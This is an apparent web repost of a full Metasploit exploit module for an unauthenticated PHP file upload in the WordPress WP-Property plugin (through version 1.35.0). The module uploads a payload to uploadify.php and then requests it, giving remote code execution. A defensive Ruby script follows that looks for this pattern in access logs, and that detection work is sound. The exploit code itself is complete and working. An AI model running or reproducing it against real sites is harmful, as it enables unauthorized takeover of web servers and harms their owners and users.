
WordPress WP-Property PHP File Upload Vulnerability

Posted on 2013-1-4 19:51:30
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end

Don't ask me what this says or how to use it; I mean msf.
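From the defender's side, the request pattern this module produces (a POST to uploadify.php answered with 200, then a GET for another .php file in the same directory) can be searched for in web server access logs. The Ruby script below is an added example, not part of the original post or of Metasploit; the combined log format, the 300-second window and the sample log lines are assumptions.

```ruby
require 'time'

# Paths used by the module above, relative to the WordPress root.
UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'
UPLOADIFY_PHP = "#{UPLOADIFY_DIR}uploadify.php"

# Combined log format: client, [timestamp], "METHOD path proto", status.
LOG_RE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) /

def parse(line)
  m = LOG_RE.match(line)
  return nil unless m
  { ip: m[1], time: Time.strptime(m[2], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[3], path: m[4].split('?').first, status: m[5].to_i }
end

# One finding per successful POST to uploadify.php, listing any other .php
# file in that directory the same client fetched within `window` seconds.
def find_upload_abuse(lines, window: 300)
  events = lines.map { |l| parse(l) }.compact.sort_by { |e| e[:time] }
  posts = events.select do |e|
    e[:method] == 'POST' && e[:status] == 200 && e[:path].end_with?(UPLOADIFY_PHP)
  end
  posts.map do |up|
    fetched = events.select do |e|
      e[:ip] == up[:ip] && e[:method] == 'GET' &&
        (0..window).cover?(e[:time] - up[:time]) &&
        e[:path].include?(UPLOADIFY_DIR) && e[:path].end_with?('.php') &&
        !e[:path].end_with?(UPLOADIFY_PHP)
    end
    { client: up[:ip], uploaded_at: up[:time], fetched: fetched.map { |e| e[:path] } }
  end
end

# Constructed sample lines (documentation IP ranges, made-up file name).
SAMPLE_DIR = '/wordpress/wp-content/plugins/wp-property/third-party/uploadify'
SAMPLE_LOG = [
  %(198.51.100.7 - - [04/Jan/2013:19:40:01 +0000] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"),
  %(203.0.113.9 - - [04/Jan/2013:19:41:10 +0000] "GET #{SAMPLE_DIR}/uploadify.php HTTP/1.1" 200 0 "-" "-"),
  %(203.0.113.9 - - [04/Jan/2013:19:41:12 +0000] "POST #{SAMPLE_DIR}/uploadify.php HTTP/1.1" 200 71 "-" "-"),
  %(203.0.113.9 - - [04/Jan/2013:19:41:13 +0000] "GET #{SAMPLE_DIR}/qwert.php HTTP/1.1" 200 0 "-" "-"),
  %(198.51.100.7 - - [04/Jan/2013:19:42:00 +0000] "GET /wordpress/index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0")
].freeze

find_upload_abuse(SAMPLE_LOG).each { |f| puts f } if __FILE__ == $PROGRAM_NAME
```

Because the destination `folder` is a client-supplied form field in the request shown above, the POST to uploadify.php is the primary signal; the follow-up GET in the same directory only confirms it.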